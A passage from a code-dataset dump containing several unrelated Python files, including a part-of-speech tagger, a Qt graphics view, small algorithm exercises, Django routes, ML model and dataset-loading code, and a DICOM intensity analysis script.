'pron':{'prob':0},\\\n 'prt':{'prob':0},\\\n 'verb':{'prob':0},\\\n 'x':{'prob':0}}\n else:\n tag_prob_dict = {'.':{'prob':0},\\\n 'adj':{'prob':0},\\\n 'adp':{'prob':0},\\\n 'adv':{'prob':0},\\\n 'conj':{'prob':0},\\\n 'det':{'prob':0},\\\n 'noun':{'prob':1},\\\n 'num':{'prob':0},\\\n 'pron':{'prob':0},\\\n 'prt':{'prob':0},\\\n 'verb':{'prob':0},\\\n 'x':{'prob':0}}\n break\n \n #emmission prob = P(W=sentence[it]|S=tag)\n emm_prob = prob_w_s\n #check for start, if start then trans_prob = initial_probability,P(S0=tag)\n #else trans_prob = P(S=curr_tag|S=prev_tag)\n if it == 0: \n if curr_tag not in self.initial_prob_tag_dict.keys():\n init_prob = 0\n else:\n init_prob = self.initial_prob_tag_dict[curr_tag]\\\n /sum(self.initial_prob_tag_dict.values())\n tag_prob_dict[curr_tag]['prob'] = emm_prob * init_prob\n tag_prob_dict[curr_tag]['prev_tag'] = ''\n else:\n max_prob_list = []\n for prev_tag in viterbi_list[-1].keys():\n if curr_tag not in self.transition_dict[prev_tag].keys():\n trans_prob = 0\n else:\n trans_prob = self.transition_dict[prev_tag][curr_tag]\\\n /self.transition_dict[prev_tag]['transition_count']\n temp_prob = (viterbi_list[-1][prev_tag]['prob']*trans_prob,prev_tag)\n max_prob_list.append(temp_prob)\n likely_tag = max(max_prob_list, key=lambda x:x[0])\n tag_prob_dict[curr_tag]['prob'] = emm_prob*likely_tag[0]\n tag_prob_dict[curr_tag]['prev_tag'] = likely_tag[1]\n 
viterbi_list.append(tag_prob_dict)\n \n #Find the tag with the max probability at start for backtracking\n most_prob_seq = []\n probable_tag = max(viterbi_list[-1],key=lambda x:viterbi_list[-1][x]['prob'])\n most_prob_seq.append(probable_tag)\n viterbi_list = viterbi_list[::-1]\n #Start backtracking..\n for i in viterbi_list[:-1]:\n tag_in_seq = i[probable_tag]['prev_tag']\n most_prob_seq.append(tag_in_seq)\n probable_tag = i[probable_tag]['prev_tag']\n return most_prob_seq[::-1]\n\n \n def calc_prob_distribution(self ,sample_tags ,sentence ,tag_position):\n tags = ['.','adj','adp','adv','conj','det','noun','num','pron','prt','verb','x']\n prob_dist = []\n #if word not in traing data, then its most likely a noun\n if sentence[tag_position] not in self.word_dict.keys():\n return [0,0,0,0,0,0,1,0,0,0,0,0]\n if len(sentence)==1:\n if sentence[0] not in self.word_dict.keys():\n return [0,0,0,0,0,0,1,0,0,0,0,0]\n else:\n for tag in tags:\n if sentence[0] not in self.tag_to_word_dict[tag].keys():\n prob_w_s = 0.0000001\n else:\n prob_w_s = self.tag_to_word_dict[tag][sentence[0]]\\\n /self.tag_to_word_dict[tag]['word_count_with_tag']\n prob_s = self.tag_dict[tag]/sum(self.tag_dict.values())\n prob_dist.append(prob_w_s*prob_s)\n sum_prob = sum(prob_dist)\n prob_dist = [x/sum_prob for x in prob_dist]\n return prob_dist\n \n for i in range (len(sentence)):\n prod = 1\n if i == len(sentence)-1 and tag_position == i and i > 0:\n for tag in tags:\n if sentence[i] not in self.tag_to_word_dict[tag].keys():\n prob_w_s = 0.0000001\n else:\n prob_w_s = self.tag_to_word_dict[tag][sentence[i]]\\\n /self.tag_to_word_dict[tag]['word_count_with_tag']\n prob_s_s2_prev = self.transition_2_dict[sample_tags[i-2]].get(sample_tags[i-1]).get(tag)\n if prob_s_s2_prev == None:\n prob_s_s2_prev = 0.0000001\n else:\n prob_s_s2_prev = prob_s_s2_prev/self.transition_2_dict[sample_tags[i-2]].get(sample_tags[i-1]).get('transition_count')\n prob_dist.append(prob_w_s * prob_s_s2_prev)\n \n elif i == 0 and tag_position == 0:\n for tag in tags:\n if sentence[i] not in self.tag_to_word_dict[tag].keys():\n prob_w_s = 0.0000001\n else:\n prob_w_s = self.tag_to_word_dict[tag][sentence[tag_position]]\\\n /self.tag_to_word_dict[tag]['word_count_with_tag']\n prob_s = self.tag_dict[tag]/sum(self.tag_dict.values()) \n if sample_tags[i+1] not in self.transition_dict[tag].keys():\n prob_s_s1 = 0.0000001\n else:\n prob_s_s1 = self.transition_dict[tag][sample_tags[1]]\\\n /self.transition_dict[tag]['transition_count']\n prob_dist.append(prob_w_s*prob_s*prob_s_s1)\n \n elif i == 0 and tag_position != 0:\n if sentence[i] not in self.tag_to_word_dict[sample_tags[i]].keys():\n prob_w_s = 0.0000001\n else:\n prob_w_s = self.tag_to_word_dict[sample_tags[i]][sentence[i]]\\\n /self.tag_to_word_dict[sample_tags[i]]['word_count_with_tag']\n prob_s = self.tag_dict[sample_tags[i]]/sum(self.tag_dict.values())\n prod = prod * prob_w_s * prob_s\n elif i == 1 and tag_position == 1:\n for tag in tags:\n if sentence[i] not in self.tag_to_word_dict[tag].keys():\n prob_w_s = 0.0000001\n else:\n prob_w_s = self.tag_to_word_dict[tag][sentence[i]]\\\n /self.tag_to_word_dict[tag]['word_count_with_tag']\n if tag not in self.transition_dict[sample_tags[i-1]].keys():\n prob_s_s1 = 0.0000001\n else:\n prob_s_s1 = self.transition_dict[sample_tags[i-1]][tag]\\\n /self.transition_dict[sample_tags[i-1]]['transition_count']\n prob_s_s2 = self.transition_2_dict[sample_tags[0]].get(tag)\n if prob_s_s2 == None:\n prob_s_s2 = 0.0000001\n else:\n prob_s_s2 = 
self.transition_2_dict[sample_tags[0]].get(tag).get(sample_tags[2])\n if prob_s_s2 == None:\n prob_s_s2 = 0.0000001\n else:\n prob_s_s2 = prob_s_s2/self.transition_2_dict[sample_tags[0]].get(tag).get('transition_count')\n prob_dist.append(prob_w_s*prob_s_s1*prob_s_s2)\n elif i == 1 and tag_position != i:\n if sentence[i] not in self.tag_to_word_dict[sample_tags[i]].keys():\n prob_w_s = 0.0000001\n else:\n prob_w_s = self.tag_to_word_dict[sample_tags[i]][sentence[i]]\\\n /self.tag_to_word_dict[sample_tags[i]]['word_count_with_tag']\n if tag_position > i:\n if sample_tags[i] not in self.transition_dict[sample_tags[i-1]].keys():\n prob_s_s1 = 0.0000001\n else:\n prob_s_s1 = self.transition_dict[sample_tags[i-1]][sample_tags[i]]\\\n /self.transition_dict[sample_tags[i-1]]['transition_count']\n prod = prod * prob_w_s * prob_s_s1\n elif tag_position < i:\n prod = prod * prob_w_s \n \n elif i > 1 and tag_position == i:\n for tag in tags:\n if sentence[i] not in self.tag_to_word_dict[tag].keys():\n prob_w_s = 0.0000001\n else:\n prob_w_s = self.tag_to_word_dict[tag][sentence[i]]\\\n /self.tag_to_word_dict[tag]['word_count_with_tag']\n prob_s_s2_prev = self.transition_2_dict[sample_tags[i-2]].get(sample_tags[i-1]).get(tag)\n if prob_s_s2_prev == None:\n prob_s_s2_prev = 0.0000001\n else:\n prob_s_s2_prev = prob_s_s2_prev/self.transition_2_dict[sample_tags[i-2]].get(sample_tags[i-1]).get('transition_count')\n prob_s_s2_next = self.transition_2_dict[sample_tags[i-1]].get(tag)\n if prob_s_s2_next == None:\n prob_s_s2_next = 0.0000001\n else:\n prob_s_s2_next = self.transition_2_dict[sample_tags[i-1]].get(tag).get(sample_tags[i+1])\n if prob_s_s2_next == None:\n prob_s_s2_next = 0.0000001\n else:\n prob_s_s2_next = prob_s_s2_next/self.transition_2_dict[sample_tags[i-1]].get(tag).get('transition_count')\n prob_dist.append(prob_w_s * prob_s_s2_prev * prob_s_s2_next)\n elif i > 1 and tag_position != i:\n if sentence[i] not in self.tag_to_word_dict[sample_tags[i]].keys():\n prob_w_s = 0.0000001\n else:\n prob_w_s = self.tag_to_word_dict[sample_tags[i]][sentence[i]]\\\n /self.tag_to_word_dict[sample_tags[i]]['word_count_with_tag']\n if tag_position > i or tag_position < i-1:\n prob_s_s2_prev = self.transition_2_dict[sample_tags[i-2]].get(sample_tags[i-1])\n if prob_s_s2_prev == None:\n prob_s_s2_prev = 0.0000001\n else:\n prob_s_s2_prev = self.transition_2_dict[sample_tags[i-2]].get(sample_tags[i-1]).get(sample_tags[i])\n if prob_s_s2_prev == None:\n prob_s_s2_prev = 0.0000001\n else:\n prob_s_s2_prev = prob_s_s2_prev/self.transition_2_dict[sample_tags[i-2]].get(sample_tags[i-1]).get('transition_count')\n prod = prod * prob_w_s * prob_s_s2_prev \n elif tag_position == i-1:\n prod = prod * prob_w_s\n prob_dist = [prod*x for x in prob_dist]\n sum_prob = sum(prob_dist)\n prob_dist = [x/sum_prob for x in prob_dist]\n return prob_dist\n \n def complex_mcmc(self, sentence):\n tags = ['.','adj','adp','adv','conj','det','noun','num','pron','prt','verb','x']\n iteration = 2500\n warm_period =500\n particles = []\n self.sentence = sentence\n sample = np.random.choice(tags,len(sentence))\n while(iteration>0):\n for i in range (0,len(sentence)):\n self.sample = sample\n prob_dist = self.calc_prob_distribution(sample,sentence,i)\n self.prob_dist = prob_dist\n sample[i] = np.random.choice(tags,1,p=prob_dist)[0]\n if iteration>= warm_period:\n particles.append(sample)\n iteration -= 1 \n sen_length = len(sentence)\n word_tag = {i:{} for i in range (0,sen_length)}\n for sample in particles:\n for i in 
range(0,sen_length):\n if sample[i] not in word_tag[i].keys():\n word_tag[i][sample[i]] = 1\n else:\n word_tag[i][sample[i]] += 1\n \n pred_tags = [max(word_tag[i],key=lambda x:word_tag[i][x]) for i in range(sen_length)]\n return pred_tags\n\n \n def solve(self, model, sentence):\n if model == \"Simple\":\n return self.simplified(sentence)\n elif model == \"Complex\":\n return self.complex_mcmc(sentence)\n elif model == \"HMM\":\n return self.hmm_viterbi(sentence)\n else:\n print(\"Unknown algo!\")\n\n","repo_name":"anuragkumar95/Projects","sub_path":"Parts of Speech Tagging/pos_tagging using HMM/pos_solver.py","file_name":"pos_solver.py","file_ext":"py","file_size_in_byte":23986,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71559923309","text":"from PySide2.QtCore import Qt, QRectF, QPoint, Signal, Slot, QEvent\n\nfrom PySide2.QtWidgets import QWidget, QGraphicsView, QOpenGLWidget, QScrollBar\n\nfrom PySide2.QtGui import (\n QDragEnterEvent,\n QDragMoveEvent,\n QDropEvent,\n QMouseEvent,\n QPainter,\n QSurfaceFormat,\n QTransform,\n QWheelEvent,\n )\n\n\n# from PySide2.QtOpenGL import QGL, QGLFormat\n\nimport math\n\n\nclass TabletView(QGraphicsView):\n\n def __init__(self, parent : QWidget = None):\n QGraphicsView.__init__(self, parent)\n\n # glWidget = QOpenGLWidget()\n # f = QSurfaceFormat()\n # f.setSamples(4)\n # glWidget.setFormat(f)\n # self.setViewport(glWidget)\n\n # self.setDragMode(QGraphicsView.ScrollHandDrag)\n self.setRenderHint(QPainter.Antialiasing)\n\n self.setBackgroundBrush(Qt.lightGray)\n\n self.setHorizontalScrollBarPolicy(Qt.ScrollBarAsNeeded)\n self.setVerticalScrollBarPolicy(Qt.ScrollBarAsNeeded)\n\n self.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)\n self.setVerticalScrollBarPolicy(Qt.ScrollBarAlwaysOff)\n\n # self.setOptimizationFlags(QGraphicsView.DontSavePainterState)\n self.setViewportUpdateMode(QGraphicsView.FullViewportUpdate)\n # self.setViewportUpdateMode(QGraphicsView.SmartViewportUpdate)\n\n self.setTransformationAnchor(QGraphicsView.AnchorUnderMouse)\n\n # self.setCacheMode(QGraphicsView.CacheBackground)\n\n\n def dotsPerMeter(self):\n return self.physicalDpiX() / 0.0254\n\n def drawBackground(self, painter : QPainter, r : QRectF):\n QGraphicsView.drawBackground(self, painter, r)\n\n\n\nclass TabletViewHead(TabletView):\n def __init__(self, parent : QWidget = None):\n TabletView.__init__(self, parent)\n\n self.scale(self.dotsPerMeter(), self.dotsPerMeter())\n\n @Slot(QTransform)\n def onTransformed(self, t):\n \"\"\"\n Sync tranformations with the body.\n \"\"\"\n myTransform = self.transform()\n\n myTransform.translate(-myTransform.m13() + t.m12(), 0.0)\n myTransform.scale(t.m11() / myTransform.m11(), 1.0)\n\n self.setTransform(myTransform)\n\n\n\nclass TabletViewBody(TabletView):\n\n transformed = Signal(QTransform)\n\n def __init__(self, parent : QWidget = None):\n TabletView.__init__(self, parent)\n\n self.scale(self.dotsPerMeter(), self.dotsPerMeter() / 500.0)\n # print(\"table transform\", self.transform())\n\n self._scale_multiplier = 1.2\n\n self.viewport().setAcceptDrops(True)\n\n self.viewport().installEventFilter(self)\n\n\n def wheelEvent(self, event : QWheelEvent):\n\n delta = event.angleDelta();\n if delta.y() == 0:\n event.ignore()\n return\n d = delta.y() / math.fabs(delta.y())\n\n if event.modifiers() & Qt.ControlModifier or \\\n event.modifiers() & Qt.ShiftModifier:\n\n if d > 0.0:\n self._scaleUp(event);\n else:\n self._scaleDown(event);\n\n else:\n 
QGraphicsView.wheelEvent(self, event)\n\n def eventFilter(self, obj, event : QEvent):\n if event.type() == QEvent.MouseButtonPress:\n # Enter here any button you like\n if event.button() == Qt.MiddleButton:\n # temporarly enable dragging mode\n self.setDragMode(QGraphicsView.ScrollHandDrag)\n # emit a left mouse click (the default button for the drag mode)\n pressEvent = QMouseEvent(QEvent.GraphicsSceneMousePress,\n event.pos(),\n Qt.LeftButton,\n Qt.LeftButton,\n Qt.NoModifier)\n\n self.mousePressEvent(pressEvent)\n elif event.type() == QEvent.MouseButtonRelease:\n # # disable drag mode if dragging is finished\n self.setDragMode(QGraphicsView.NoDrag)\n\n return False\n else:\n return QGraphicsView.eventFilter(self, obj, event)\n\n\n def _scaleUp(self, event):\n\n x_factor = self._scale_multiplier\n\n if event.modifiers() & Qt.ShiftModifier:\n x_factor = 1.0\n\n self.scale(x_factor, self._scale_multiplier)\n\n t = self.transform()\n\n self.transformed.emit(t)\n\n def _scaleDown(self, event):\n\n x_factor = 1.0 / self._scale_multiplier\n\n if event.modifiers() & Qt.ShiftModifier:\n x_factor = 1.0\n\n self.scale(x_factor, 1.0 / self._scale_multiplier)\n\n t = self.transform()\n self.transformed.emit(t)\n","repo_name":"iGeophysix/gamma","sub_path":"components/tablet/gui/TabletView.py","file_name":"TabletView.py","file_ext":"py","file_size_in_byte":4656,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24421012557","text":"def none(n):\n su=0\n for i in range(1,n):\n if(n%i==0):\n su+=i\n return su\na=int(input())\nif(none(a)==a):\n print(\"True\")\nelse:\n print(\"False\")","repo_name":"Navya-relli/codemind-python","sub_path":"Perfect_Number.py","file_name":"Perfect_Number.py","file_ext":"py","file_size_in_byte":172,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"74900848427","text":"# for i = 1 to n-1\n# j = i\n# while j > 0 and A[j] < A[j-1]\n# swap A[j] with A[j-1]\n# j = j-1\n\nimport random\nimport copy\n\ndef sort(seq):\n temp = 1\n # BEGIN (write your solution here)\n for x in range(1, len(seq)):\n b = x\n while b > 0 and seq[b] < seq[b-1]:\n temp = seq[b]\n seq[b] = seq[b-1]\n seq[b-1] = temp\n b = b - 1\n # END\n\n return seq\n\n\n# Generate random sequence\nsorted_seq = [x for x in range(10) if random.choice([True, False])]\n\nunsorted_seq = copy.copy(sorted_seq)\nrandom.shuffle(unsorted_seq)\n\nassert sorted_seq == sort(unsorted_seq)\n","repo_name":"basedalexander/data-structures-and-algorithms-javascript","sub_path":"algorithms/sorting/basic/py/insertionSort.py","file_name":"insertionSort.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41179728790","text":"from django.urls import path\nfrom django.conf import settings\nfrom django.conf.urls.static import static\nfrom . 
import views\n\n\nurlpatterns = [\n    path('', views.index, name='index'),\n    path('log_out/', views.log_out, name=\"log_out\"),\n    path('home/', views.home, name='home'),\n    path('log_in/', views.log_in, name=\"log_in\"),\n    path('profile/', views.profile, name='profile'),\n    path('edit_profile/',views.edit_profile, name = 'edit_profile'),\n    path('update_location/',views.update_location, name = 'update_location'),\n    path('primper/',views.primper, name='primper')\n]\n\nif settings.DEBUG:\n    urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)","repo_name":"rjrobins16/passion2","sub_path":"PrimpApp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30482424522","text":"import numpy as np\nimport sys\nfrom MLModel import MLModel\nfrom Plots import roc, prc\n\nfrom sklearn import svm\nfrom sklearn.multiclass import OneVsRestClassifier\n\nclass SVCModel(MLModel):\n    def __init__(self, data_file):\n        super().__init__(data_file, \"results_svc.txt\", 0.5)\n\n    def model_build(self):\n        return OneVsRestClassifier(svm.SVC(kernel='linear', probability=True))\n\n    def model_run(self, model):\n        y_score = model.fit(self.X_train, self.y_train).decision_function(self.X_test)\n        accu_train = np.sum(model.predict(self.X_train) == self.y_train) / self.y_train.size\n        # use hard class predictions for test accuracy; decision_function scores never equal the labels\n        accu_test = np.sum(model.predict(self.X_test) == self.y_test) / self.y_test.size\n\n        self.results.write(\"Model Results\\n\")\n        self.results.write(\"Accuracy on Train: \" + str(accu_train) + \"\\n\")\n        self.results.write(\"Accuracy on Test: \" + str(accu_test) + \"\\n\")\n\n        return model, y_score\n\n    def model_probs(self, model):\n        if not model:\n            model = OneVsRestClassifier(svm.SVC(kernel='linear', probability=True))\n            model.fit(self.X_train, self.y_train).decision_function(self.X_test)\n        predictions = model.predict_proba(self.X_test)\n        return predictions\n\n    def kfold_run(self):\n        model = self.model_build()\n        super().kfold_run(model)\n\nif __name__ == \"__main__\":\n    svc = SVCModel(sys.argv[1])\n    svc_model = svc.model_build()\n    model, y_score = svc.model_run(svc_model)\n    svc.kfold_run()\n    probs = svc.model_probs(model=model)\n    svc.roc(probs, \"SVC ROC Graph\", \"svc_roc.png\")\n","repo_name":"kindalime/Gerstein-Lab-Breakseq","sub_path":"docker/models/scripts/svc.py","file_name":"svc.py","file_ext":"py","file_size_in_byte":1548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42075006360","text":"import ksc\nfrom ksc.tracing.functions import core, math, nn\n\n\n@ksc.trace\ndef dense(x, weights):\n    W, b = weights\n    return math.broadcast_add(math.dot(x, math.transpose(W)), b)\n\n\n@ksc.trace\ndef conv_block(x, weights, strides):\n    (\n        conv_1_weights,\n        norm_1_weights,\n        conv_2_weights,\n        norm_2_weights,\n        conv_3_weights,\n        norm_3_weights,\n    ) = weights\n    h = nn.conv_2d_no_bias(x, conv_1_weights, (1, 1), strides)\n    h = nn.batch_norm_2d(h, norm_1_weights)\n    h = nn.relu(h)\n    h = nn.conv_2d_no_bias(h, conv_2_weights, (3, 3), (1, 1))\n    h = nn.batch_norm_2d(h, norm_2_weights)\n    h = nn.relu(h)\n    h = nn.conv_2d_no_bias(h, conv_3_weights, (1, 1), (1, 1))\n    return nn.batch_norm_2d(h, norm_3_weights)\n\n\n@ksc.trace\ndef conv_residual_block(x, weights, strides):\n    (conv_block_weights, shortcut_conv_weights, shortcut_norm_weights) = weights\n    main = conv_block(x, conv_block_weights, strides)\n    h = nn.conv_2d_no_bias(x, shortcut_conv_weights, (1, 1), strides)\n    shortcut = 
nn.batch_norm_2d(h, shortcut_norm_weights)\n return nn.relu(main + shortcut)\n\n\n@ksc.trace\ndef identity_residual_block(x, weights):\n main = conv_block(x, weights, (1, 1))\n return nn.relu(main + x)\n\n\n@ksc.trace\ndef resnet(x, weights):\n (\n normalization_weights,\n conv_weights,\n batch_norm_weights,\n residual_blocks_weights,\n final_dense_weights,\n ) = weights\n h = nn.normalize_2d(x, normalization_weights)\n h = nn.conv_2d_no_bias(h, conv_weights, (7, 7), (2, 2))\n h = nn.batch_norm_2d(h, batch_norm_weights)\n h = nn.relu(h)\n h = nn.max_pool(h, (3, 3), (2, 2), padding=\"SAME\")\n for i, blocks_weights in enumerate(residual_blocks_weights):\n for j, weights in enumerate(blocks_weights):\n if j == 0:\n strides = (1, 1) if i == 0 else (2, 2)\n h = conv_residual_block(h, weights, strides)\n else:\n h = identity_residual_block(h, weights)\n h = nn.avg_pool(h, (7, 7), (1, 1))\n h = core.flatten(h)\n h = dense(h, final_dense_weights)\n return nn.log_softmax(h)\n","repo_name":"microsoft/knossos-ksc","sub_path":"examples/dl-resnet/resnet.py","file_name":"resnet.py","file_ext":"py","file_size_in_byte":2134,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"37"} +{"seq_id":"71926257067","text":"import numpy as np\n\nimport torch\nimport evaluate\nfrom itertools import chain\nfrom typing import Optional, Tuple, Dict, List, Any, Type\nfrom transformers import AutoTokenizer, AutoImageProcessor\nfrom transformers.data.data_collator import default_data_collator\nfrom transformers.tokenization_utils import PreTrainedTokenizerBase\nfrom transformers.image_processing_utils import BaseImageProcessor\nfrom torchvision.transforms import (\n CenterCrop,\n Compose,\n Normalize,\n RandomHorizontalFlip,\n RandomResizedCrop,\n Resize,\n ToTensor,\n)\nfrom datasets import Dataset, load_dataset\n\nfrom oobleck.module.model import lang_models, image_models\n\n\nclass OobleckDataset:\n \"\"\"\n Load datasets from Hugging Face Hub (https://huggingface.co/datasets)\n and do preprocessing.\n \"\"\"\n\n def __init__(\n self,\n model_name: str,\n dataset_path: str,\n dataset_name: Optional[str] = None,\n max_seq_length: Optional[int] = None,\n ):\n # TODO: replace it with evaluate.load(\"accuracy\")\n metric = evaluate.load(\"accuracy\")\n\n if any(lang_model in model_name for lang_model in lang_models):\n self.tokenizer, self.dataset = OobleckDataset.create_language_dataset(\n model_name, dataset_path, dataset_name, max_seq_length\n )\n\n def compute_metrics(eval_preds):\n preds, labels = eval_preds\n # preds have the same shape as the labels, after the argmax(-1) has been calculated\n # by preprocess_logits_for_metrics but we need to shift the labels\n labels = labels[:, 1:].reshape(-1)\n preds = preds[:, :-1].reshape(-1)\n return metric.compute(predictions=preds, references=labels)\n\n self.compute_metrics = compute_metrics\n\n self.data_collator = default_data_collator\n elif any(image_model in model_name for image_model in image_models):\n self.tokenizer, self.dataset = OobleckDataset.create_image_dataset(\n model_name, dataset_path, dataset_name\n )\n\n def compute_metrics(p):\n return metric.compute(\n predictions=np.argmax(p.predictions, axis=1), references=p.label_ids\n )\n\n self.compute_metrics = compute_metrics\n\n def collate_fn(examples):\n pixel_values = torch.stack(\n [example[\"pixel_values\"] for example in examples]\n )\n labels = torch.tensor([example[\"labels\"] for example in examples])\n return {\"pixel_values\": pixel_values, \"labels\": 
labels}\n\n self.data_collator = collate_fn\n\n else:\n self.dataset = None\n\n assert (\n self.dataset\n ), f\"Dataset it not initialized because given model {model_name} is not supported yet.\"\n\n trace_input = next(iter(self.dataset[\"train\"]))\n self.sample = self.data_collator([trace_input])\n\n @staticmethod\n def create_image_dataset(\n model_name: str,\n dataset_path: str,\n dataset_name: Optional[str],\n ) -> Tuple[Type[BaseImageProcessor], Dataset]:\n dataset = load_dataset(dataset_path, dataset_name, task=\"image-classification\")\n\n # If we don't have a validation split, split off a percentage of train as validation.\n if \"validation\" not in dataset.keys():\n split = dataset[\"train\"].train_test_split(0.05)\n dataset[\"train\"] = split[\"train\"]\n dataset[\"validation\"] = split[\"test\"]\n\n image_processor = AutoImageProcessor.from_pretrained(model_name)\n size = (\n image_processor.size[\"shortest_edge\"]\n if \"shortest_edge\" in image_processor.size\n else (image_processor.size[\"height\"], image_processor.size[\"width\"])\n )\n\n normalize = Normalize(\n mean=image_processor.image_mean, std=image_processor.image_std\n )\n _train_transforms = Compose(\n [\n RandomResizedCrop(size),\n RandomHorizontalFlip(),\n ToTensor(),\n normalize,\n ]\n )\n _val_transforms = Compose(\n [\n Resize(size),\n CenterCrop(size),\n ToTensor(),\n normalize,\n ]\n )\n\n def train_transforms(example_batch):\n \"\"\"Apply _train_transforms across a batch.\"\"\"\n example_batch[\"pixel_values\"] = [\n _train_transforms(pil_img.convert(\"RGB\"))\n for pil_img in example_batch[\"image\"]\n ]\n return example_batch\n\n def val_transforms(example_batch):\n \"\"\"Apply _val_transforms across a batch.\"\"\"\n example_batch[\"pixel_values\"] = [\n _val_transforms(pil_img.convert(\"RGB\"))\n for pil_img in example_batch[\"image\"]\n ]\n return example_batch\n\n dataset[\"train\"].set_transform(train_transforms)\n dataset[\"validation\"].set_transform(val_transforms)\n\n return image_processor, dataset\n\n @staticmethod\n def create_language_dataset(\n model_name: str,\n dataset_path: str,\n dataset_name: Optional[str],\n max_seq_length: Optional[int] = None,\n ) -> Tuple[Type[PreTrainedTokenizerBase], Dataset]:\n tokenizer = AutoTokenizer.from_pretrained(model_name)\n\n raw_dataset = load_dataset(dataset_path, dataset_name)\n if \"validation\" not in raw_dataset.keys():\n raw_dataset[\"validation\"] = load_dataset(\n dataset_path,\n dataset_name,\n split=f\"train[:5%]\",\n )\n\n column_names = list(raw_dataset[\"train\"].features)\n text_column_name = \"text\" if \"text\" in column_names else column_names[0]\n\n if max_seq_length is None:\n max_seq_length = tokenizer.model_max_length\n\n def tokenize_function(examples):\n return tokenizer(examples[text_column_name])\n\n tokenized_datasets = raw_dataset.map(\n tokenize_function,\n batched=True,\n remove_columns=column_names,\n load_from_cache_file=True,\n )\n\n def group_texts(examples):\n # Concatenate all texts.\n concatenated_examples = {\n k: list(chain(*examples[k])) for k in examples.keys()\n }\n total_length = len(concatenated_examples[list(examples.keys())[0]])\n # We drop the small remainder, we could add padding if the model supported it instead of this drop, you can\n # customize this part to your needs.\n if total_length >= max_seq_length:\n total_length = (total_length // max_seq_length) * max_seq_length\n # Split by chunks of max_len.\n result = {\n k: [\n t[i : i + max_seq_length]\n for i in range(0, total_length, max_seq_length)\n ]\n 
for k, t in concatenated_examples.items()\n            }\n            result[\"labels\"] = result[\"input_ids\"].copy()\n            return result\n\n        tokenized_datasets = tokenized_datasets.map(\n            group_texts, batched=True, load_from_cache_file=True\n        )\n\n        return tokenizer, tokenized_datasets\n","repo_name":"SymbioticLab/Oobleck","sub_path":"oobleck/execution/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":7393,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"37"} +{"seq_id":"10653700249","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport matplotlib.pyplot as plt\nfrom preprocessing import *\nimport numpy as np\nimport seaborn as sns\nfrom skimage import data, io, filters\nimport matplotlib\nmyfont = matplotlib.font_manager.FontProperties(fname=\"/usr/share/fonts/Consolas+YaHei+hybrid.ttf\", size=12)\nif __name__ == '__main__':\n    #\n    df = process_data(\"数据集1/*/*/*.dcm\")\n    # df = df[df['phase'] == 'arterial phase']\n    idxs = []\n    array = []\n    # count = 0\n    for idx, sample in enumerate(df.iterrows()):\n        # dcm = itk_read(sample[1]['path_dcm'])\n        # img = cv2.imread(sample[1]['path_mask'], cv2.IMREAD_GRAYSCALE)\n        # if img.any():\n        #     count += 1\n        # idxs.append(idx)\n        dcm = itk_read_(sample[1]['path_dcm']).astype('int16')\n        array.append(dcm)\n        # array.append(dcm)\n        # plt.imshow(filters.sobel(dcm/2500))\n        # plt.show()\n        # array.append(dcm)\n    tmp = np.stack(array, 0) # tmp = np.concatenate(array, None)\n    # sns.distplot(tmp.tolist())\n    # sns.heatmap(tmp.mean(0))\n    plt.hist(tmp.ravel(), bins=100)  # 1-D histogram of all HU values (plt.hist2d needs separate x and y arrays)\n    plt.xlabel('HU', fontproperties=myfont)\n    # plt.title('标记区域hu值分布', fontproperties=myfont)\n    plt.savefig('HU无坐标.svg', format='svg')\n\n    plt.hist(tmp.ravel())\n    plt.show()\n    sns.distplot(np.concatenate(array, None))\n    # print(count)\n\n\n\n    # df = process_data(\"数据集1/*/*/*.dcm\")\n    # # idxs = []\n    # array = []\n    # for idx, sample in enumerate(df.iterrows()):\n    #     img = cv2.imread(sample[1]['path_mask'], cv2.IMREAD_GRAYSCALE)\n    #     array.append(img)\n    # temp = np.concatenate(array, None)\n    # plt.hist(temp)\n    # plt.show()\n    # temp //= 255\n    # print((temp.size-temp.sum())/temp.sum())\n    #\n    # df = process_data(\"数据集1/*/*/*.dcm\")\n    # idxs = []\n    # array = []\n    # for idx, sample in enumerate(df.iterrows()):\n    #     img = cv2.imread(sample[1]['path_mask'], cv2.IMREAD_GRAYSCALE)\n    #     if img.any():\n    #         # idxs.append(idx)\n    #         dcm = itk_read(sample[1]['path_dcm'])\n    #         # plt.imshow(np.logical_and(dcm>-50, dcm<100))\n    #         # plt.imshow(dcm, plt.cm.bone)\n    #         plt.show()\n    #         array.append(dcm[np.nonzero(dcm * img)] )\n    # plt.hist(np.concatenate(array, None))\n    # plt.show()\n    # pass","repo_name":"zhanglei1172/TaiDi","sub_path":"datasets/prepare_image.py","file_name":"prepare_image.py","file_ext":"py","file_size_in_byte":2343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31708760486","text":"# -*- coding: utf-8 -*-\n#@Time :2019/8/18 0:09\n#@Author :XiaoMa\nimport tensorflow as tf\nimport numpy as 
